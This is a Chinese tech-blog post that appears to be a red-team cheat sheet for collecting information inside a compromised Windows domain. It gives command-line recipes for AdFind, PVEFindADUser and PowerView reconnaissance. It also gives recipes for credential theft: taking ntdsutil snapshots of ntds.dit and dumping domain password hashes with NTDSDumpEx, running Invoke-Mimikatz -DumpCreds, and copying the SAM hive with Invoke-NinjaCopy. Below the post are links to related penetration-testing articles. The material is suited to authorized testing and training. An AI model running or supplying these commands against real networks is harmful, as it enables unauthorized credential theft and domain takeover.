内网渗透----域内信息收集

最新推荐文章于 2023-08-21 18:53:06 发布
最新推荐文章于 2023-08-21 18:53:06 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: # 内网技巧 文章标签: 域内信息收集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84404724
版权

工具使用

Nslookup
nslookup                               # 进入交互式界面
set type=all                           # 设置记录类型,可以设置为srv
_ldap._tcp.dc._msdcs.school.com        # 执行查询

在这里插入图片描述

ADFind.exe

列出域控列表

Adfind.exe -sc dclist

在这里插入图片描述

查询域中活动的主机,输出主机名和域名

AdFind.exe -sc computers_active name dnshostname

在这里插入图片描述
查询域中活动的主机详细信息

AdFind.exe -b dc=qianxiao996,dc=com -f "objectcategory=computer"

在这里插入图片描述
查询域管理员账户(未成功)

AdFind.exe -b cn="domain admins",dc=qianxaio996,dc=com member

在这里插入图片描述

从结果中筛选出SPN及域名

Adfind -sc computers_active servicePrincipalName dnshostname

在这里插入图片描述

PVEFindADUser.exe

显示每台计算机上登录的用户

PVEFindaduser -current  -noping

在这里插入图片描述

查看192.168.91.133主机上登录的用户

PVEFindADuser  -current  -target 192.168.91.133

在这里插入图片描述

查看每台计算机上次登录的用户

PVEFindADuser  -last

在这里插入图片描述

Netview.exe
netview.exe -f ip.txt

在这里插入图片描述

Netsess.exe
NetSess.exe

在这里插入图片描述

csvde.exe (域控)

在域控上使用csvde导出用户信息、域成员主机信息,域管理员信息
用户信息:

csvde.exe -d "cn=users,dc=com" -r "objextclass=user" -f .\Desktop\1.csv

在这里插入图片描述

域成员主机信息:
在这里插入图片描述

域管理员信息:
在这里插入图片描述

导出域控中用户HASH

ntdsutil(必须以管理员运行cmd)
ntdsutil snapshot "activate instance ntds" create quit quit

在这里插入图片描述

记得把快照保存下来

ntdsutil snapshot "mount {GUID}" quit quit

在这里插入图片描述

将文件复制出来
在这里插入图片描述

ntdsutil snapshot "unmount {GUID}" quit quit
ntdsutil snapshot " delete {GUID} " quit quit

在这里插入图片描述

Ntdsdumpex.exe

域控上运行:

NTDSDumpEx.exe -r -d C:\Users\Aministrator\Desktop\ntds.dit –o hash.txt

在这里插入图片描述
本地运行:

Ntdsdumpex.exe -r

在这里插入图片描述

NTDSDumpEx.exe -k 4D54B7E7F7C6541D4FF486B8A83DC5B1 -d ntds.dit -o hash.txt

PowerSploit的使用

Invoke-Mimikatz(依赖管理员)
Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

在这里插入图片描述
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

在这里插入图片描述

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
在这里插入图片描述

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)
Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

在这里插入图片描述
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

在这里插入图片描述

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

在这里插入图片描述

Invoke-Wmicommand
Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

在这里插入图片描述

Get-NetDomain
Import-Module .\PowerView.ps1
Get-NetDomain

在这里插入图片描述

Get-NetDomainController
get-NetDomainController

在这里插入图片描述

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

在这里插入图片描述

Get-NetShare获取共享信息
get-netshare

在这里插入图片描述

浅笑⁹⁹⁶
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透信息收集
09-30 5754
当获取了一台在内的Windows服务器权限,就需要我们尽可能地去收集所能获取到的的相关信息,收集的的信息越多,拿下控的成功率越高。01、判断是否存在(1)一般我们在进行本机信息收...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听
最新发布
HACKONE的博客
06-25 74
NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在 Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。2、利用Net-NTLM Hash中继攻击(Net NTLM Hash相同)#横向移动-NTLM中继-暴力破解&Relay攻击。
内网渗透——信息收集
LainWith的博客
10-09 875
目录手工信息收集基本命令查看用户信息查看共享信息查看ARP缓存查看本机共享获取系统补丁情况查看系统信息查看已安装软件信息本地运行环境查看服务信息查看进程列表/杀软查看启动项查看开机时间查看计划任务RDP连接日志防火墙状态开启远程桌面环境相关命令判断是否存在查看用户信息查看用户详细信息查看用户组信息查看管理员账户查看管理员用户组定位控查看控制器查看主控制器信任传送查看内用户组列表自动信息收集自动化工具wmic_info(很强)LaZagnexenarmorNishangmetaspl
中信息搜集
qq_52178795的博客
10-12 677
信息搜集
内信息搜集
include_heqile的博客
09-02 318
http://144.34.164.217/yu-nei-xin-xi-sou-ji.html
内网渗透信息搜集
LuckySec
04-12 3992
当渗透测试进入内网后,面对复杂的内网环境,首先需要了解当前所处的网络环境,例如判断当前机器的的角色,当前机器所处位置区,以及当前网络环境的拓扑结构等。因此,我们需要对当前内网环境进行信息搜集。
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
Windows内网渗透主要针对Windows环境,因为控制器拥有高级权限,可以控制整个内的计算机,从而获取目标权限和数据。 1. **服务主体名称(SPN)收集**: SPN是Kerberos协议的关键元素,用于识别提供服务的...
[HACK学习呀] - 2020-08-23 内网渗透 - 内网中的信息收集1
08-03
内网渗透是网络安全领的重要环节,特别是在企业网络环境中,一旦突破外围防线,内网信息收集成为继续渗透的关键步骤。本文将详细阐述内网中的信息收集方法,主要关注在工作组环境下的策略。 首先,识别网络环境是...
内网渗透知识大全1-87章全部教程
04-08
内网渗透教程1-87全 包含87章pdf格式的文档 1.内网渗透(一)之基础...14.内网渗透(十四)之内网信息收集-环境中查找内用户基本信息 15.内网渗透(十五)之内网信息收集-环境中定位管理员 ···········
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
渗透测试 _ 内网信息收集1
08-03
- **内网配置**:IP地址段、网络配置、是否在内。 - **软件和杀毒**:安装的软件和杀毒软件版本。 - **端口和服务**:开放的端口和运行的服务。 - **网络连接**:连接的设备和网络状态。 - **共享和会话**:共享...
PVEFindADUser.exe
04-05
PVEFindADUser.exe
信息收集
wtylcam的博客
03-14 502
信息收集
信息收集
路虽远,行将至。事虽难,做必达。
03-06 507
以下列举常用信息收集,包括但不限于此。 查询: net view /domain 查询内所有计算机: net view /domain:domain_name 查询内所有用户组列表: net group /domain 查询控: net group "domain controllers" /domain 查询当前时间: net time /domain 查询用户列表: net...
网络安全之信息收集(一)
qq_52074678的博客
05-18 441
信息收集 本机信息 1.查询账户信息 对当前主机的用户角色和用户权限进一步了解,判断是否需要提权 DMZ普通用户需要提权到system用户,进行横向移动 2.查询网络和端口信息 根据目的主机的ip信息/网络连接/相关网络地址,初步确定网络状态 win:ipconfig, netstat -ano ARP路由表:arp -a 路由表:route print 查看dns缓存记录命令:ipconfig/displaydns linux:ifconfig, netstat -
内网渗透测试:用户和机器用户
Innocence_0的博客
08-21 678
这又是一个关于内基础概念与原理的系列,本系列将包含以下几篇文章:《内网渗透测试:内网环境与活动目录基础概念》《内网渗透测试:活动目录 Active Directory 的查询》《内网渗透测试:用户组及内权限划分》《内网渗透测试:OU 组织单位》《内网渗透测试:用户和机器用户》《内网渗透测试:内权限访问控制》《内网渗透测试:Windows 令牌窃取》《内网渗透测试:Windows 组策略讲解》《内网渗透测试:Windows 组策略后门》
渗透基础知识(三)之用户与机器用户
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-03 3023
大家都知道用户是什么,就是环境中的用户。和本地用户的帐户不同,用户帐户保存在活动目录中。由于所有的用户帐户都集中保存在活动目录中,所以使得集中管理变成可能。我们知道,在工作组环境中,所有计算机是独立的,要让用户能够登录到计算机并使用计算机的资源,必须为每个用户建立本地用户帐户。而在环境中,一个用户可以在中的任何一台计算机上登录,用户可以不再使用固定的计算机。当计算机出现故障时,用户可以登录到另一台计算机上继续工作,这样也使帐号的管理变得简单。
渗透技巧
Gamma_lab的博客
08-06 646
内网信息收集 SPN的发现 前言: 由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行大规模端口扫描的情况下收集有关内网环境的信息提供了一个更加隐蔽的方法。 工具: SetSPN查询: windows系统自带的setspn可以查询内的SPN #查看当前内所有的SPN: setspn -Q */* #查看指定xie.com注册的SPN: setspn -T xie.com -Q */* setspn -X删除指定SPN 查找指定用户/主机名注册的SPN:setspn
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行...2. 配置内部DNS服务器,限制DNS请求和响应中的名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值